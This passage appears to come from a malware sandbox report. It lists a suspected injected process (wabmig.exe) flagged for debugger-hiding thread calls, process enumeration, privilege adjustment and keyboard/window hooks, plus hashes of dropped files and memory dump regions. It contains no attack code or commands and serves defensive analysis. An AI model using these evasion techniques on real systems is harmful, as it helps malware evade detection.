              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:3776

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dwymaize.dyp.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Varmefordeling.Rds
      Filesize

      423KB

      MD5

      bcb5d8ebc641f888c81ac3120a8b528d

      SHA1

      e8aba2dd4bded85617590e106698c73dd5930aaa

      SHA256

      5e34c719ce17f317f0101640de71e99a4733fceff40a087559eb7c60ccca739f

      SHA512

      41ca115f78e7c03931f5b43c26464a6e06349d171fd5569171515b405f18240dba103c059c0dda498cfec1aa3b57ecb07eae3cf371ee1af1d5ae190a3141b1b2

      Download Submit

    • memory/3228-39-0x0000000006990000-0x00000000069DC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/3228-41-0x0000000006EE0000-0x0000000006EFA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/3228-40-0x0000000008230000-0x00000000088AA000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/3228-46-0x0000000009410000-0x000000000D340000-memory.dmp

      Filesize

      63.2MB

      Download

    • memory/3228-44-0x0000000008E60000-0x0000000009404000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/3228-42-0x0000000007C50000-0x0000000007CE6000-memory.dmp

      Filesize

      600KB

      Download

    • memory/3228-22-0x0000000002FE0000-0x0000000003016000-memory.dmp

      Filesize

      216KB

      Download

    • memory/3228-23-0x0000000005AA0000-0x00000000060C8000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/3228-24-0x0000000005A10000-0x0000000005A32000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3228-25-0x0000000006140000-0x00000000061A6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3228-26-0x00000000061B0000-0x0000000006216000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3228-36-0x0000000006320000-0x0000000006674000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/3228-43-0x0000000007BB0000-0x0000000007BD2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3228-38-0x0000000006950000-0x000000000696E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/3776-70-0x00000000246A0000-0x00000000246AA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/3776-48-0x0000000002260000-0x0000000006190000-memory.dmp

      Filesize

      63.2MB

      Download

    • memory/3776-69-0x0000000024D00000-0x0000000024D92000-memory.dmp

      Filesize

      584KB

      Download

    • memory/3776-68-0x0000000024650000-0x00000000246A0000-memory.dmp

      Filesize

      320KB

      Download

    • memory/3776-63-0x0000000001000000-0x0000000002254000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/3776-64-0x0000000001000000-0x0000000001040000-memory.dmp

      Filesize

      256KB

      Download

    • memory/3776-59-0x0000000001000000-0x0000000002254000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4488-19-0x00007FFDEB620000-0x00007FFDEC0E1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4488-47-0x00007FFDEB620000-0x00007FFDEC0E1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4488-18-0x00007FFDEB623000-0x00007FFDEB625000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4488-5-0x0000026D53860000-0x0000026D53882000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4488-16-0x00007FFDEB620000-0x00007FFDEC0E1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4488-21-0x00007FFDEB620000-0x00007FFDEC0E1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4488-67-0x00007FFDEB620000-0x00007FFDEC0E1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4488-37-0x00007FFDEB620000-0x00007FFDEC0E1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4488-15-0x00007FFDEB620000-0x00007FFDEC0E1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4488-4-0x00007FFDEB623000-0x00007FFDEB625000-memory.dmp

      Filesize

      8KB

      Download